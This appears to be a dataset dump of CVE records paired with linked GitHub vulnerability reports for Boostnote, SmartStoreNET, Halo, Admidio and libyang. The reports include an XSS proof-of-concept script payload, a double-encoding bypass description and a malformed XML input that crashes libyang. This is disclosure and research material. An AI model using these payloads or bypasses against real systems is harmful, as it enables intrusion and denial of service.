cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2020-19924
2021-05-18T20:15:07.363
In Boostnote 0.12.1, exporting to PDF contains opportunities for XSS attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BoostIO/Boostnote/issues/3178" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BoostIO/Boostnote/issues/3178" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:issuehunt:boostnote:0.12.1:*:*:*:*:*:*:*", "matchCriteriaId": "59A78615-9005-4D5F-A189-230A4692FDFC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/BoostIO/Boostnote/issues/3178
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "BoostIO", "Boostnote" ]
# Current behavior Notes Exported to PDF Format Is Existing XSS Attacks. # Expected behavior Notes Exported to PDF Format Is Existing XSS Attacks. When there is a code in the note: \``` JavaScript % 3Cscript%3Ealert('XSS')%3C/script%3E \``` XSS attacks are triggered when the export PDF function is reused. ![xss-payload1.png](https://i.loli.net/2019/07/28/5d3dacfe8b00798461.png) # Steps to reproduce #### 1. Put the payload below into your notes. - Payload: \``` JavaScript % 3Cscript%3Ealert('XSS')%3C/script%3E \``` I cut a picture: ![xss-payload.png](https://i.loli.net/2019/07/28/5d3daae59837570430.png) #### 2. Click on the "Info" button in the upper right corner of the note to export the file in PDF format. This will trigger payload to generate a bullet window, that is, there is an XSS attack. # Environment - Version : 0.12.1 - OS Version and name : Microsoft Windows 10 Home Chinese Version
Exporting to PDF contains opportunities for XSS attacks
https://api.github.com/repos/BoostIO/BoostNote-Legacy/issues/3178/comments
1
2019-07-28T14:16:18Z
2021-03-21T02:47:40Z
https://github.com/BoostIO/BoostNote-Legacy/issues/3178
473,748,812
3,178
1,973
CVE-2020-36364
2021-05-19T19:15:08.267
An issue was discovered in Smartstore (aka SmartStoreNET) before 4.1.0. Administration/Controllers/ImportController.cs allows path traversal (for copy and delete actions) in the ImportController.Create method via a TempFileName field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/smartstore/SmartStoreNET/commit/5ab1e37dc8d6415d04354e1a116f3d82e9555f5c" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/smartstore/SmartStoreNET/issues/2112" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/smartstore/SmartStoreNET/commit/5ab1e37dc8d6415d04354e1a116f3d82e9555f5c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/smartstore/SmartStoreNET/issues/2112" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:*", "matchCriteriaId": "F00DD480-1853-4312-9C94-0928D81690C9", "versionEndExcluding": "4.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/smartstore/SmartStoreNET/issues/2112
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "smartstore", "SmartStoreNET" ]
Hello Thanks for maintaining this open-source project I would like to report a path traversal vulnerability similar to: - https://github.com/smartstore/SmartStoreNET/issues/1592 - https://github.com/smartstore/SmartStoreNET/issues/1592 In the [ImportController.Create](https://github.com/smartstore/SmartStoreNET/blob/760141838e741ce24079052dd82c0bfb7753e1be/src/Presentation/SmartStore.Web/Administration/Controllers/ImportController.cs#L385) method, the `model.TempFileName` user-controlled input is not validated and an attacker can perform a path traversal attack to [copy an arbitrary file into a new profil and delete the original file](https://github.com/smartstore/SmartStoreNET/blob/760141838e741ce24079052dd82c0bfb7753e1be/src/Presentation/SmartStore.Web/Administration/Controllers/ImportController.cs#L397). ![image](https://user-images.githubusercontent.com/56015232/95458867-17326600-0973-11eb-9ce4-4a0e9e8ec28a.png) Eric
Path Traversal Vulnerability
https://api.github.com/repos/smartstore/SmartStoreNET/issues/2112/comments
2
2020-10-08T12:36:16Z
2020-10-13T13:24:50Z
https://github.com/smartstore/SmartStoreNET/issues/2112
717,305,590
2,112
1,974
CVE-2020-36365
2021-05-19T19:15:08.307
Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/smartstore/SmartStoreNET/issues/2113" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/smartstore/SmartStoreNET/issues/2113" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:*", "matchCriteriaId": "F00DD480-1853-4312-9C94-0928D81690C9", "versionEndExcluding": "4.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/smartstore/SmartStoreNET/issues/2113
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "smartstore", "SmartStoreNET" ]
Hello This issue to address this open redirect vulnerability in the [CommonController.ClearCache](https://github.com/smartstore/SmartStoreNET/blob/639b0d3a6bbeb85a2ac06f7f1082eaf3ec8f46ba/src/Presentation/SmartStore.Web/Administration/Controllers/CommonController.cs#L1042) method. Example: ![image](https://user-images.githubusercontent.com/56015232/95477248-6cc53d80-0988-11eb-9264-d91a1004e62d.png) Eric
Open redirect vulnerability in CommonController.ClearCache method
https://api.github.com/repos/smartstore/SmartStoreNET/issues/2113/comments
1
2020-10-08T15:05:56Z
2020-10-13T10:10:28Z
https://github.com/smartstore/SmartStoreNET/issues/2113
717,430,152
2,113
1,975
CVE-2020-21345
2021-05-20T17:15:07.517
Cross Site Scripting (XSS) vulnerability in Halo 1.1.3 via post publish components in the manage panel, which lets a remote malicious user execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/336" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/336" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:-:*:*:*:*:*:*", "matchCriteriaId": "1CB4664A-F423-4172-B79D-C082E4DDBC76", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/halo-dev/halo/issues/336
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **我确定我已经查看了** (标注`[ ]`为`[x]`) - [x] [Halo 使用文档](https://halo.run/docs) - [x] [Halo 论坛](https://bbs.halo.run) - [x] [Github Wiki 常见问题](https://github.com/halo-dev/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [其他 Issues](https://github.com/halo-dev/halo/issues) ---- **我要申请** (标注`[ ]`为`[x]`) - [x] BUG 反馈 - [ ] 添加新的特性或者功能 - [ ] 请求技术支持 在后台添加博客文章时,代码中没有对插入的内容进行过滤和限制,可以插入XSS语句,前台用户访问便可以触发XSS,存在安全风险。 ![image](https://user-images.githubusercontent.com/42511919/66836824-a1303480-ef94-11e9-80a5-d5fb186b566c.png) ![image](https://user-images.githubusercontent.com/42511919/66836909-c02ec680-ef94-11e9-989a-7320f597eb91.png) 在后台上传头像时,抓取上传文件的数据包,修改文件后缀,后端代码(halo/blob/master/src/main/java/run/halo/app/service/impl/AttachmentServiceImpl.java)没有限制,可以上传任意后缀的文件,导致存在安全风险。 ![image](https://user-images.githubusercontent.com/42511919/66837891-57484e00-ef96-11e9-9f64-f2466554f272.png) ![image](https://user-images.githubusercontent.com/42511919/66837210-33d0d380-ef95-11e9-8431-fd3c1ab0859c.png)
后台添加文章XSS,上传头像处可以上传任意文件
https://api.github.com/repos/halo-dev/halo/issues/336/comments
1
2019-10-15T13:56:16Z
2019-10-17T12:28:28Z
https://github.com/halo-dev/halo/issues/336
507,262,618
336
1,976
CVE-2021-32630
2021-05-20T17:15:07.773
Admidio is a free, open source user management system for websites of organizations and groups. In Admidio before version 4.0.4, there is an authenticated RCE via .phar file upload. A php web shell can be uploaded via the Documents & Files upload feature. Someone with upload permissions could rename the php shell with a .phar extension, visit the file, triggering the payload for a reverse/bind shell. This can be mitigated by excluding a .phar file extension to be uploaded (like you did with .php .phtml .php5 etc). The vulnerability is patched in version 4.0.4.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.1, "impactScore": 5.8, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Admidio/admidio/issues/994" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/Admidio/admidio/releases/tag/v4.0.4" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xpqj-67r8-25j2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Admidio/admidio/issues/994" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/Admidio/admidio/releases/tag/v4.0.4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xpqj-67r8-25j2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "matchCriteriaId": "2648A1F8-BEE6-468C-8FFD-BC8B014A3006", "versionEndExcluding": "4.0.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/Admidio/admidio/issues/994
[ "Third Party Advisory" ]
github.com
[ "Admidio", "admidio" ]
-Authenticated Local File Inclusion. Need admin or upload permissions. Someone with upload permissions can use the move to db ability to "get" local files and move to the Documents & Folders view. The mitigation to block "/" from file names works, but if you double encode it, it bypasses the check...
Authenticated local file inclusion possible
https://api.github.com/repos/Admidio/admidio/issues/994/comments
0
2021-01-23T18:35:40Z
2021-01-23T18:35:44Z
https://github.com/Admidio/admidio/issues/994
792,623,959
994
1,977
CVE-2021-28902
2021-05-20T19:15:07.590
In function read_yin_container() in libyang <= v1.0.225, it doesn't check whether the value of retval->ext[r] is NULL. In some cases, it can be NULL, which leads to the operation of retval->ext[r]->flags that results in a crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1454" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1454" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:*:*:*:*:*:*:*:*", "matchCriteriaId": "6CFE711D-6C8F-4F0F-B53E-BB952DC1FF39", "versionEndExcluding": null, "versionEndIncluding": "1.0.225", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "252" ]
252
https://github.com/CESNET/libyang/issues/1454
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
``` <?xm?> <module name="inse" xmlns="urn:ietf:params:xml:ns:yang:yin:1" xmlns:inst="urn:li yangnstznce"> <namespace uri="ag:tests:instance"/> <prefix value="inst"/> <organization> <text>CEs.p.o.</text> </organization> <contact> <text>Radek Krejesne</text> </contact> <revision date="2016-02-03"> tion> </revision> <container name="insttests"> <leaf name="l___________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________se" xmlns="ur_________________________________________________________________________________________________________________________________________________________O_________________________________________________________________________________________________________________ink"> <type name="insta8ce-ideeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee@eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeveeeeeeeeeeeeeeeeeeeeeeeeeeeeeeCCCCCCCCCCCCCCCCCCeeeeeeeeeeeeeeeeeeeeeeeeeeeeeepeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeueeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee